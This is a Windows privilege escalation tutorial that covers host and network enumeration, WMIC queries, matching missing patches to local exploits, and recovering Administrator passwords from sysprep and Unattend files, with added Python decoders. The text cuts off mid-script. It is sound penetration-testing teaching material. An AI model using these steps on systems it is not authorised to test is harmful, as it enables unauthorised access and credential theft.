Windows 权限提升基础知识



This article walks through a typical Windows privilege escalation process and the techniques and steps involved along the way: from initial information gathering and environment reconnaissance, through the abuse of weak Windows service configurations, scheduled tasks and file/folder permissions, showing step by step how privilege escalation is carried out during a penetration test.

Contents:

  • t1 to t3 cover initial information gathering and basic environment reconnaissance.

  • t4 focuses on deeper information gathering with WMIC.

  • t5 to t6 cover quick checks for obvious missing patches and configuration weaknesses.

  • t7 to t10 cover the more involved techniques; t7 concentrates on abusing Windows service configuration and permission weaknesses to escalate privileges.


It is a shame that serious Windows privilege escalation gets so little discussion. I think the reasons are:

(1) During pentest engagements a low-privileged shell is usually all the proof the customer needs that a vulnerability exists.

(2) In staged environments you often land the Administrator account straight away.

(3) Meterpreter makes pentesters lazy. Its getsystem command automatically tries a handful of elevation techniques to get SYSTEM, and because it is so convenient it is tempting to rely on it instead of understanding, or performing by hand, what it actually does. getsystem = lazy-fu.

(4) Build reviews too often end up being an authenticated Nessus scan plus the Microsoft Baseline Security Analyzer...

Contrary to popular belief, a properly configured Windows system can be very secure, and the window between a privilege escalation bug becoming public and a patch being available is short. So let's dig into the dark corners of the Windows operating system and see whether we can get SYSTEM.

Note that I will use various versions of Windows to show possible command-line differences. Keep in mind that, depending on the OS and service pack, some commands may not exist or may produce slightly different output. I have tried to structure this tutorial so that it applies to Windows privilege escalation in the most general case.

Stages t0 to t3 - Initial information gathering

The starting point for this tutorial is a low-privileged shell on the target machine. We may have used a remote exploit or a client-side attack to get it. At t0 we know nothing about the machine: what it is used for, what it is connected to, what privilege level we have, or even which operating system it runs.

First, then, we quickly gather some basic information so we understand the environment and can assess our situation.

Let's start by finding out which operating system we are connected to:

C:\Windows\system32> systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601

Next we look at the hostname of the machine and the user we are currently running as.

C:\Windows\system32> hostname
b33f

C:\Windows\system32> echo %username%
user1

With the basics covered, we list the other user accounts on the box and take a closer look at our own user. We can already see that user1 is not a member of the local Administrators group (its only local group membership is Users).

C:\Windows\system32> net users

User accounts for \\B33F

-------------------------------------------------------------------------------
Administrator            b33f                     Guest
user1
The command completed successfully.

C:\Windows\system32> net user user1
User name                    user1
Full Name
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/11/2014 7:47:14 PM
Password expires             Never
Password changeable          1/11/2014 7:47:14 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   1/11/2014 8:05:09 PM

Logon hours allowed          All

Local Group Memberships      *Users
Global Group memberships     *None
The command completed successfully.

That is all we need to know about users and privileges for now. Next on the list is the network: what the machine is connected to and which rules it applies to those connections.

First let's look at the available network interfaces and the routing table.

C:\Windows\system32> ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : b33f
   Primary Dns Suffix  . . . . . . . :
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Bluetooth Network Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Bluetooth Device (Personal Area Network)
   Physical Address. . . . . . . . . : 0C-84-DC-62-60-29
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-56-79-35
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::5cd4:9caf:61c0:ba6e%11(Preferred)
   IPv4 Address. . . . . . . . . . . : 192.168.0.104(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Lease Obtained. . . . . . . . . . : Saturday, January 11, 2014 3:53:55 PM
   Lease Expires . . . . . . . . . . : Sunday, January 12, 2014 3:53:55 PM
   Default Gateway . . . . . . . . . : 192.168.0.1
   DHCP Server . . . . . . . . . . . : 192.168.0.1
   DHCPv6 IAID . . . . . . . . . . . : 234884137
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-18-14-24-1D-00-0C-29-56-79-35
   DNS Servers . . . . . . . . . . . : 192.168.0.1
   NetBIOS over Tcpip. . . . . . . . : Enabled

C:\Windows\system32> route print
===========================================================================
Interface List
 18...0c 84 dc 62 60 29 ......Bluetooth Device (Personal Area Network)
 13...00 ff 0c 0d 4f ed ......TAP-Windows Adapter V9
 11...00 0c 29 56 79 35 ......Intel(R) PRO/1000 MT Network Connection
  1...........................Software Loopback Interface 1
 16...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter
 15...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #2
 19...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #3
 14...00 00 00 00 00 00 00 e0 Teredo Tunneling Pseudo-Interface
===========================================================================

IPv4 Route Table
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0      192.168.0.1    192.168.0.104     10
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    306
        127.0.0.1  255.255.255.255         On-link         127.0.0.1    306
  127.255.255.255  255.255.255.255         On-link         127.0.0.1    306
      192.168.0.0    255.255.255.0         On-link     192.168.0.104    266
    192.168.0.104  255.255.255.255         On-link     192.168.0.104    266
    192.168.0.255  255.255.255.255         On-link     192.168.0.104    266
        224.0.0.0        240.0.0.0         On-link         127.0.0.1    306
        224.0.0.0        240.0.0.0         On-link     192.168.0.104    266
  255.255.255.255  255.255.255.255         On-link         127.0.0.1    306
  255.255.255.255  255.255.255.255         On-link     192.168.0.104    266
===========================================================================
Persistent Routes:
  None

IPv6 Route Table
===========================================================================
Active Routes:
 If Metric Network Destination      Gateway
 14     58 ::/0                     On-link
  1    306 ::1/128                  On-link
 14     58 2001::/32                On-link
 14    306 2001:0:5ef5:79fb:8d2:b4e:3f57:ff97/128
                                    On-link
 11    266 fe80::/64                On-link
 14    306 fe80::/64                On-link
 14    306 fe80::8d2:b4e:3f57:ff97/128
                                    On-link
 11    266 fe80::5cd4:9caf:61c0:ba6e/128
                                    On-link
  1    306 ff00::/8                 On-link
 14    306 ff00::/8                 On-link
 11    266 ff00::/8                 On-link
===========================================================================
Persistent Routes:
  None

# arp -A displays the ARP (Address Resolution Protocol) cache table for all available interfaces.
C:\Windows\system32> arp -A

Interface: 192.168.0.104 --- 0xb
  Internet Address      Physical Address      Type
  192.168.0.1           90-94-e4-c5-b0-46     dynamic
  192.168.0.101         ac-22-0b-af-bb-43     dynamic
  192.168.0.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.251           01-00-5e-00-00-fb     static
  224.0.0.252           01-00-5e-00-00-fc     static
  239.255.255.250       01-00-5e-7f-ff-fa     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static

Next we look at the current network connections and the firewall rules.

C:\Windows\system32> netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       684
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5357           0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:5354         0.0.0.0:0              LISTENING       1400
  TCP    192.168.0.104:139      0.0.0.0:0              LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       684
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:5357              [::]:0                 LISTENING       4
  UDP    0.0.0.0:5355           *:*                                    1100
  UDP    0.0.0.0:52282          *:*                                    976
  UDP    0.0.0.0:55202          *:*                                    2956
  UDP    0.0.0.0:59797          *:*                                    1400
  UDP    127.0.0.1:1900         *:*                                    2956
  UDP    127.0.0.1:65435        *:*                                    2956
  UDP    192.168.0.104:137      *:*                                    4
  UDP    192.168.0.104:138      *:*                                    4
  UDP    192.168.0.104:1900     *:*                                    2956
  UDP    192.168.0.104:5353     *:*                                    1400
  UDP    192.168.0.104:65434    *:*                                    2956
  UDP    [::]:5355              *:*                                    1100
  UDP    [::]:52281             *:*                                    976
  UDP    [::]:52283             *:*                                    976
  UDP    [::]:55203             *:*                                    2956
  UDP    [::]:59798             *:*                                    1400
  UDP    [::1]:1900             *:*                                    2956
  UDP    [::1]:5353             *:*                                    1400
  UDP    [::1]:65433            *:*                                    2956
  UDP    [fe80::5cd4:9caf:61c0:ba6e%11]:1900  *:*                      2956
  UDP    [fe80::5cd4:9caf:61c0:ba6e%11]:65432  *:*                     2956

# The following two netsh commands are examples of commands that are not universal across OS/SP.
# The "netsh firewall" context is only available from XP SP2 upwards, and from Vista onwards it is
# deprecated in favour of "netsh advfirewall" (e.g. "netsh advfirewall show allprofiles").
C:\Windows\system32> netsh firewall show state

Firewall status:
-------------------------------------------------------------------
Profile                           = Standard
Operational mode                  = Enable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Enable
Group policy version              = Windows Firewall
Remote admin mode                 = Disable

Ports currently open on all network interfaces:
Port   Protocol  Version  Program
-------------------------------------------------------------------
No ports are currently open on all network interfaces.

C:\Windows\system32> netsh firewall show config

Domain profile configuration:
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Enable

Allowed programs configuration for Domain profile:
Mode     Traffic direction    Name / Program
-------------------------------------------------------------------

Port configuration for Domain profile:
Port   Protocol  Mode    Traffic direction     Name
-------------------------------------------------------------------

ICMP configuration for Domain profile:
Mode     Type  Description
-------------------------------------------------------------------
Enable   2     Allow outbound packet too big

Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Enable

Service configuration for Standard profile:
Mode     Customized  Name
-------------------------------------------------------------------
Enable   No          Network Discovery

Allowed programs configuration for Standard profile:
Mode     Traffic direction    Name / Program
-------------------------------------------------------------------
Enable   Inbound              COMRaider / E:\comraider\comraider.exe
Enable   Inbound              nc.exe / C:\users\b33f\desktop\nc.exe

Port configuration for Standard profile:
Port   Protocol  Mode    Traffic direction     Name
-------------------------------------------------------------------

ICMP configuration for Standard profile:
Mode     Type  Description
-------------------------------------------------------------------
Enable   2     Allow outbound packet too big

Log configuration:
-------------------------------------------------------------------
File location   = C:\Windows\system32\LogFiles\Firewall\pfirewall.log
Max file size   = 4096 KB
Dropped packets = Disable
Connections     = Disable

Finally, we take a brief look at what is running on the compromised machine: scheduled tasks, running processes, started services and installed drivers.

# This will display verbose output for all scheduled tasks; below you can see sample output for a single task.
C:\Windows\system32> schtasks /query /fo LIST /v

Folder: \Microsoft\Windows Defender
HostName:                             B33F
TaskName:                             \Microsoft\Windows Defender\MP Scheduled Scan
Next Run Time:                        1/22/2014 5:11:13 AM
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          c:\program files\windows defender\MpCmdRun.exe Scan -ScheduleJob
                                      -WinTask -RestrictPrivilegesScan
Start In:                             N/A
Comment:                              Scheduled Scan
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 1 minutes, If Not Idle Retry For 240 minutes
Power Management:                     No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           5:11:13 AM
Start Date:                           1/1/2000
End Date:                             1/1/2100
Days:                                 Every 1 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

[..Snip..]

# The following command links running processes to started services.
C:\Windows\system32> tasklist /SVC

Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
smss.exe                       244 N/A
csrss.exe                      332 N/A
csrss.exe                      372 N/A
wininit.exe                    380 N/A
winlogon.exe                   428 N/A
services.exe                   476 N/A
lsass.exe                      484 SamSs
lsm.exe                        496 N/A
svchost.exe                    588 DcomLaunch, PlugPlay, Power
svchost.exe                    668 RpcEptMapper, RpcSs
svchost.exe                    760 Audiosrv, Dhcp, eventlog,
                                   HomeGroupProvider, lmhosts, wscsvc
svchost.exe                    800 AudioEndpointBuilder, CscService, Netman,
                                   SysMain, TrkWks, UxSms, WdiSystemHost,
                                   wudfsvc
svchost.exe                    836 AeLookupSvc, BITS, gpsvc, iphlpsvc,
                                   LanmanServer, MMCSS, ProfSvc, Schedule,
                                   seclogon, SENS, ShellHWDetection, Themes,
                                   Winmgmt, wuauserv
audiodg.exe                    916 N/A
svchost.exe                    992 EventSystem, fdPHost, netprofm, nsi,
                                   WdiServiceHost, WinHttpAutoProxySvc
svchost.exe                   1104 CryptSvc, Dnscache, LanmanWorkstation,
                                   NlaSvc
spoolsv.exe                   1244 Spooler
svchost.exe                   1272 BFE, DPS, MpsSvc
mDNSResponder.exe             1400 Bonjour Service
taskhost.exe                  1504 N/A
taskeng.exe                   1556 N/A
vmtoolsd.exe                  1580 VMTools
dwm.exe                       1660 N/A
explorer.exe                  1668 N/A
vmware-usbarbitrator.exe      1768 VMUSBArbService
TPAutoConnSvc.exe             1712 TPAutoConnSvc

[..Snip..]

C:\Windows\system32> net start

These Windows services are started:

   Application Experience
   Application Information
   Background Intelligent Transfer Service
   Base Filtering Engine
   Bluetooth Support Service
   Bonjour Service
   COM+ Event System
   COM+ System Application
   Cryptographic Services
   DCOM Server Process Launcher
   Desktop Window Manager Session Manager
   DHCP Client
   Diagnostic Policy Service
   Diagnostic Service Host
   Diagnostic System Host
   Distributed Link Tracking Client
   Distributed Transaction Coordinator
   DNS Client
   Function Discovery Provider Host
   Function Discovery Resource Publication
   Group Policy Client

[..Snip..]

# This can be useful sometimes as some 3rd party drivers, even by reputable companies, contain more holes
# than Swiss cheese. This is only possible because ring0 exploitation lies outside most people's expertise.
C:\Windows\system32> DRIVERQUERY

Module Name  Display Name           Driver Type   Link Date
============ ====================== ============= ======================
1394ohci     1394 OHCI Compliant Ho Kernel        11/20/2010 6:01:11 PM
ACPI         Microsoft ACPI Driver  Kernel        11/20/2010 4:37:52 PM
AcpiPmi      ACPI Power Meter Drive Kernel        11/20/2010 4:47:55 PM
adp94xx      adp94xx                Kernel        12/6/2008 7:59:55 AM
adpahci      adpahci                Kernel        5/2/2007 1:29:26 AM
adpu320      adpu320                Kernel        2/28/2007 8:03:08 AM
AFD          Ancillary Function Dri Kernel        11/20/2010 4:40:00 PM
agp440       Intel AGP Bus Filter   Kernel        7/14/2009 7:25:36 AM
aic78xx      aic78xx                Kernel        4/12/2006 8:20:11 AM
aliide       aliide                 Kernel        7/14/2009 7:11:17 AM
amdagp       AMD AGP Bus Filter Dri Kernel        7/14/2009 7:25:36 AM
amdide       amdide                 Kernel        7/14/2009 7:11:19 AM
AmdK8        AMD K8 Processor Drive Kernel        7/14/2009 7:11:03 AM
AmdPPM       AMD Processor Driver   Kernel        7/14/2009 7:11:03 AM
amdsata      amdsata                Kernel        3/19/2010 9:08:27 AM
amdsbs       amdsbs                 Kernel        3/21/2009 2:35:26 AM
amdxata      amdxata                Kernel        3/20/2010 12:19:01 AM
AppID        AppID Driver           Kernel        11/20/2010 5:29:48 PM
arc          arc                    Kernel        5/25/2007 5:31:06 AM

[..Snip..]

Stage t4 - The mysteries of WMIC

I want to single out WMIC (Windows Management Instrumentation Command-Line) because it is, in my view, the most useful command-line tool Windows has. WMIC is extremely practical both for information gathering and for post-exploitation. That said, it is a little clunky to operate and its output leaves something to be desired.

Fully explaining how to use WMIC would take a tutorial of its own, and some of its output is hard to present because of formatting issues.

Two resources worth reading:

Command-Line Ninjitsu (SynJunkie) - [here](https://synjunkie.blogspot.com/2008/09/command-line-ninjitsu-4-wmic.html)
Windows WMIC Command Line (ComputerHope) - [here](https://www.computerhope.com/wmic.htm)

Unfortunately, some default Windows configurations do not allow access to WMIC unless the user is in the Administrators group (which is arguably a sensible security measure). From my testing on virtual machines I noticed that no version of XP allows low-privileged accounts to access WMIC. Conversely, default installations of Windows 7 Professional and Windows 8 Enterprise allow low-privileged users to use WMIC and query the operating system without changing any settings. That is exactly what we need, because we will use WMIC to gather information about the target machine.

To give you an idea of how broad WMIC's options are, here is the list of available command-line switches and aliases.

C:\Windows\system32> wmic /?

[global switches] <command>

The following global switches are available:
/NAMESPACE           Path for the namespace the alias operate against.
/ROLE                Path for the role containing the alias definitions.
/NODE                Servers the alias will operate against.
/IMPLEVEL            Client impersonation level.
/AUTHLEVEL           Client authentication level.
/LOCALE              Language id the client should use.
/PRIVILEGES          Enable or disable all privileges.
/TRACE               Outputs debugging information to stderr.
/RECORD              Logs all input commands and output.
/INTERACTIVE         Sets or resets the interactive mode.
/FAILFAST            Sets or resets the FailFast mode.
/USER                User to be used during the session.
/PASSWORD            Password to be used for session login.
/OUTPUT              Specifies the mode for output redirection.
/APPEND              Specifies the mode for output redirection.
/AGGREGATE           Sets or resets aggregate mode.
/AUTHORITY           Specifies the <authority type> for the connection.
/?[:<BRIEF|FULL>]    Usage information.

For more information on a specific global switch, type: switch-name /?

The following alias/es are available in the current role:
ALIAS                    - Access to the aliases available on the local system
BASEBOARD                - Base board (also known as a motherboard or system board) management.
BIOS                     - Basic input/output services (BIOS) management.
BOOTCONFIG               - Boot configuration management.
CDROM                    - CD-ROM management.
COMPUTERSYSTEM           - Computer system management.
CPU                      - CPU management.
CSPRODUCT                - Computer system product information from SMBIOS.
DATAFILE                 - DataFile Management.
DCOMAPP                  - DCOM Application management.
DESKTOP                  - User's Desktop management.
DESKTOPMONITOR           - Desktop Monitor management.
DEVICEMEMORYADDRESS      - Device memory addresses management.
DISKDRIVE                - Physical disk drive management.
DISKQUOTA                - Disk space usage for NTFS volumes.
DMACHANNEL               - Direct memory access (DMA) channel management.
ENVIRONMENT              - System environment settings management.
FSDIR                    - Filesystem directory entry management.
GROUP                    - Group account management.
IDECONTROLLER            - IDE Controller management.
IRQ                      - Interrupt request line (IRQ) management.
JOB                      - Provides access to the jobs scheduled using the schedule service.
LOADORDER                - Management of system services that define execution dependencies.
LOGICALDISK              - Local storage device management.
LOGON                    - LOGON Sessions.
MEMCACHE                 - Cache memory management.
MEMORYCHIP               - Memory chip information.
MEMPHYSICAL              - Computer system's physical memory management.
NETCLIENT                - Network Client management.
NETLOGIN                 - Network login information (of a particular user) management.
NETPROTOCOL              - Protocols (and their network characteristics) management.
NETUSE                   - Active network connection management.
NIC                      - Network Interface Controller (NIC) management.
NICCONFIG                - Network adapter management.
NTDOMAIN                 - NT Domain management.
NTEVENT                  - Entries in the NT Event Log.
NTEVENTLOG               - NT eventlog file management.
ONBOARDDEVICE            - Management of common adapter devices built into the motherboard (system board).
OS                       - Installed Operating System/s management.
PAGEFILE                 - Virtual memory file swapping management.
PAGEFILESET              - Page file settings management.
PARTITION                - Management of partitioned areas of a physical disk.
PORT                     - I/O port management.
PORTCONNECTOR            - Physical connection ports management.
PRINTER                  - Printer device management.
PRINTERCONFIG            - Printer device configuration management.
PRINTJOB                 - Print job management.
PROCESS                  - Process management.
PRODUCT                  - Installation package task management.
QFE                      - Quick Fix Engineering.
QUOTASETTING             - Setting information for disk quotas on a volume.
RDACCOUNT                - Remote Desktop connection permission management.
RDNIC                    - Remote Desktop connection management on a specific network adapter.
RDPERMISSIONS            - Permissions to a specific Remote Desktop connection.
RDTOGGLE                 - Turning Remote Desktop listener on or off remotely.
RECOVEROS                - Information that will be gathered from memory when the operating system fails.
REGISTRY                 - Computer system registry management.
SCSICONTROLLER           - SCSI Controller management.
SERVER                   - Server information management.
SERVICE                  - Service application management.
SHADOWCOPY               - Shadow copy management.
SHADOWSTORAGE            - Shadow copy storage area management.
SHARE                    - Shared resource management.
SOFTWAREELEMENT          - Management of the elements of a software product installed on a system.
SOFTWAREFEATURE          - Management of software product subsets of SoftwareElement.
SOUNDDEV                 - Sound Device management.
STARTUP                  - Management of commands that run automatically when users log onto the computer
                           system.
SYSACCOUNT               - System account management.
SYSDRIVER                - Management of the system driver for a base service.
SYSTEMENCLOSURE          - Physical system enclosure management.
SYSTEMSLOT               - Management of physical connection points including ports, slots and
                           peripherals, and proprietary connections points.
TAPEDRIVE                - Tape drive management.
TEMPERATURE              - Data management of a temperature sensor (electronic thermometer).
TIMEZONE                 - Time zone data management.
UPS                      - Uninterruptible power supply (UPS) management.
USERACCOUNT              - User account management.
VOLTAGE                  - Voltage sensor (electronic voltmeter) data management.
VOLUME                   - Local storage volume management.
VOLUMEQUOTASETTING       - Associates the disk quota setting with a specific disk volume.
VOLUMEUSERQUOTA          - Per user storage volume quota management.
WMISET                   - WMI service operational parameters management.

For more information on a specific alias, type: alias /?

CLASS     - Escapes to full WMI schema.
PATH      - Escapes to full WMI object paths.
CONTEXT   - Displays the state of all the global switches.
QUIT/EXIT - Exits the program.

For more information on CLASS/PATH/CONTEXT, type: (CLASS | PATH | CONTEXT) /?

To make life easier I created a script that can be dropped on the target machine and uses WMIC to extract the following: processes, services, user accounts, user groups, network interfaces, hard drive information, network share information, installed Windows patches, programs that run at startup, the list of installed software, operating system information and time zone information.

I went through the various flags and parameters to pull out the valuable bits. If anyone thinks something should be added to the list, leave a comment below. Using WMIC's built-in output functionality, the script writes all results to a single, easy-to-read HTML file.

You can download my script (wmic_info.bat) - [here](https://example.com/wmic_info.bat)
Sample output file from a (badly patched) Windows 7 VM - [here](https://example.com/sample_output.html)

Stages t5 to t6 - Quick fails

Before moving on you should take a moment to review the information gathered so far, as there should be quite a bit of it by now. The next step in our game plan is to look for quick wins that can be exploited to elevate our privileges.

The first thing to look at is the patch level, which is the most obvious one. If we find that the host is badly patched there is no need to worry about anything else. My WMIC script already lists all installed patches, but you can see the sample command-line output below.

C:\Windows\system32> wmic qfe get Caption,Description,HotFixID,InstalledOn
Caption                                     Description      HotFixID   InstalledOn
http://support.microsoft.com/?kbid=2727528  Security Update  KB2727528  11/23/2013
http://support.microsoft.com/?kbid=2729462  Security Update  KB2729462  11/26/2013
http://support.microsoft.com/?kbid=2736693  Security Update  KB2736693  11/26/2013
http://support.microsoft.com/?kbid=2737084  Security Update  KB2737084  11/23/2013
http://support.microsoft.com/?kbid=2742614  Security Update  KB2742614  11/23/2013
http://support.microsoft.com/?kbid=2742616  Security Update  KB2742616  11/26/2013
http://support.microsoft.com/?kbid=2750149  Update           KB2750149  11/23/2013
http://support.microsoft.com/?kbid=2756872  Update           KB2756872  11/24/2013
http://support.microsoft.com/?kbid=2756923  Security Update  KB2756923  11/26/2013
http://support.microsoft.com/?kbid=2757638  Security Update  KB2757638  11/23/2013
http://support.microsoft.com/?kbid=2758246  Update           KB2758246  11/24/2013
http://support.microsoft.com/?kbid=2761094  Update           KB2761094  11/24/2013
http://support.microsoft.com/?kbid=2764870  Update           KB2764870  11/24/2013
http://support.microsoft.com/?kbid=2768703  Update           KB2768703  11/23/2013
http://support.microsoft.com/?kbid=2769034  Update           KB2769034  11/23/2013
http://support.microsoft.com/?kbid=2769165  Update           KB2769165  11/23/2013
http://support.microsoft.com/?kbid=2769166  Update           KB2769166  11/26/2013
http://support.microsoft.com/?kbid=2770660  Security Update  KB2770660  11/23/2013
http://support.microsoft.com/?kbid=2770917  Update           KB2770917  11/24/2013
http://support.microsoft.com/?kbid=2771821  Update           KB2771821  11/24/2013
[..Snip..]

As usual with Windows, the output is not quite ready to use. The best strategy is to look for privilege escalation exploits and then look up the KB number of the patch that fixes each one. Such exploits include, but are not limited to, KiTrap0D (KB979682), MS11-011 (KB2393802), MS10-059 (KB982799), MS10-021 (KB979683) and MS11-080 (KB2592799). Once you have enumerated the OS version and service pack, find the privilege escalation bugs that could apply to it, then grep the installed patches for their KB numbers to see whether any of them is missing. Bear in mind that a KB can also be superseded by a later roll-up, so a missing KB is a lead to verify, not proof that the box is exploitable.

The command below greps the installed patches (replace each "KB.." with the KB number you are looking for; add as many /C: terms as you need):

C:\Windows\system32> wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
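Once the qfe output has been saved from the target it is easier to diff it against a table of known bugs on your own machine than to run one findstr per KB. The script below is an added example written for this article, not part of the original tutorial or its wmic_info.bat script: it parses the HotFixID column and reports which of the KBs named above are absent. The sample output is constructed in the shape of the wmic listing; KB979682 and KB2393802 are deliberately left out so that the report has something to show.

```python
import re

# Privilege escalation bugs named in the text above, keyed by the KB that
# fixes each. Extend this table with whatever applies to the target OS/SP.
PRIVESC_KB = {
    "KB979682":  "KiTrap0D",
    "KB2393802": "MS11-011",
    "KB982799":  "MS10-059",
    "KB979683":  "MS10-021",
    "KB2592799": "MS11-080",
}

# Constructed sample in the shape of
#   wmic qfe get Caption,Description,HotFixID,InstalledOn
# as saved from a target. KB979682 and KB2393802 are deliberately absent.
SAMPLE_QFE = """\
Caption                                     Description      HotFixID   InstalledOn
http://support.microsoft.com/?kbid=2727528  Security Update  KB2727528  11/23/2013
http://support.microsoft.com/?kbid=982799   Security Update  KB982799   11/23/2013
http://support.microsoft.com/?kbid=979683   Security Update  KB979683   11/26/2013
http://support.microsoft.com/?kbid=2592799  Security Update  KB2592799  11/26/2013
http://support.microsoft.com/?kbid=2750149  Update           KB2750149  11/23/2013
"""

# Matches the HotFixID column only: the Caption URL spells it "kbid=", so a
# case-sensitive "KB<digits>" match does not double count it.
_KB_RE = re.compile(r"\bKB\d+\b")


def installed_hotfixes(qfe_output):
    """Return the set of KB identifiers present in `wmic qfe` output.

    Note: when wmic output is redirected to a file on the target it is written
    as UTF-16LE, so open such a file with encoding="utf-16" before calling this.
    """
    return set(_KB_RE.findall(qfe_output))


def missing_privesc_patches(qfe_output, table=PRIVESC_KB):
    """Return [(kb, name), ...] for every entry of `table` that is not
    installed, sorted by KB so reports are stable."""
    present = installed_hotfixes(qfe_output)
    return sorted((kb, name) for kb, name in table.items() if kb not in present)


if __name__ == "__main__":
    for kb, name in missing_privesc_patches(SAMPLE_QFE):
        print(f"{kb:<10} {name}: patch not installed, worth a closer look")
```

A hit from this script means the specific KB is not listed, nothing more; before burning time on an exploit, confirm the OS/SP actually matches the bug and that no later roll-up superseded the patch.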

Next we look at mass deployment. When there are many machines to install, technicians generally do not walk from box to box; there are several ways to install machines automatically. How these work is not our concern here, but the key point is that they leave behind the configuration files used during the installation. These files contain a great deal of sensitive information, such as the operating system product key and the Administrator password. We are mostly interested in the Administrator password, since we can use it to elevate our privileges.

These are the usual locations of such configuration files (it is still best to check the whole OS):

c:\sysprep.inf
c:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml

These files contain the passwords either in clear text or Base64 encoded. You can see some sample file output below.

# This is a sample from sysprep.inf with clear-text credentials.

[GuiUnattended]
OEMSkipRegional=1
OemSkipWelcome=1
AdminPassword=s3cr3tp4ssw0rd
TimeZone=20

# This is a sample from sysprep.xml with Base64 "encoded" credentials. Please people, Base64 is not
# encryption; I take more precautions to protect my coffee. The password here is "SuperSecurePassword".

<LocalAccounts>
    <LocalAccount wcm:action="add">
        <Password>
            <Value>U3VwZXJTZWN1cmVQYXNzd29yZA==</Value>
            <PlainText>false</PlainText>
        </Password>
        <Description>Local Administrator</Description>
        <DisplayName>Administrator</DisplayName>
        <Group>Administrators</Group>
        <Name>Administrator</Name>
    </LocalAccount>
</LocalAccounts>

# Sample from Unattended.xml with the same "secure" Base64 encoding.

<AutoLogon>
    <Password>
        <Value>U3VwZXJTZWN1cmVQYXNzd29yZA==</Value>
        <PlainText>false</PlainText>
    </Password>
    <Enabled>true</Enabled>
    <Username>Administrator</Username>
</AutoLogon>
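One caveat a practitioner runs into here: files written by Windows Setup itself do not Base64-encode the bare password. Setup first appends a fixed suffix ("Password" for LocalAccount and AutoLogon values, "AdministratorPassword" for the AdministratorPassword element), encodes the result as UTF-16LE, and only then Base64-encodes it, whereas hand-made samples like the one above are often plain ASCII with no suffix. The script below is an added example written for this article, not the original author's code: it pulls every password element out of an unattend-style XML file and every *password* key out of a sysprep.inf, decodes both formats, and reports the decoded text together with the suffix-stripped candidate so you can try both. The sysprep.inf sample is constructed from the fragment above; the XML sample combines the hand-made LocalAccount value from the text with an AutoLogon value built here the way Setup would emit it (password "Winter2014!" is made up).

```python
import base64
import configparser
import xml.etree.ElementTree as ET

# Suffixes Windows Setup appends before UTF-16LE + Base64 encoding.
_SUFFIXES = ("AdministratorPassword", "Password")
_PASSWORD_TAGS = {"Password", "AdministratorPassword"}

# Constructed sysprep.inf sample, modelled on the fragment above.
SAMPLE_SYSPREP_INF = """\
[GuiUnattended]
OEMSkipRegional=1
OemSkipWelcome=1
AdminPassword=s3cr3tp4ssw0rd
TimeZone=20
"""

# Constructed Unattend.xml sample: the LocalAccount value is the hand-made ASCII
# one from the text; the AutoLogon value is built the way Setup writes it.
_AUTOLOGON_VALUE = base64.b64encode("Winter2014!Password".encode("utf-16-le")).decode()
SAMPLE_UNATTEND_XML = f"""<unattend xmlns="urn:schemas-microsoft-com:unattend"
          xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <UserAccounts>
        <LocalAccounts>
          <LocalAccount wcm:action="add">
            <Password>
              <Value>U3VwZXJTZWN1cmVQYXNzd29yZA==</Value>
              <PlainText>false</PlainText>
            </Password>
            <Group>Administrators</Group>
            <Name>Administrator</Name>
          </LocalAccount>
        </LocalAccounts>
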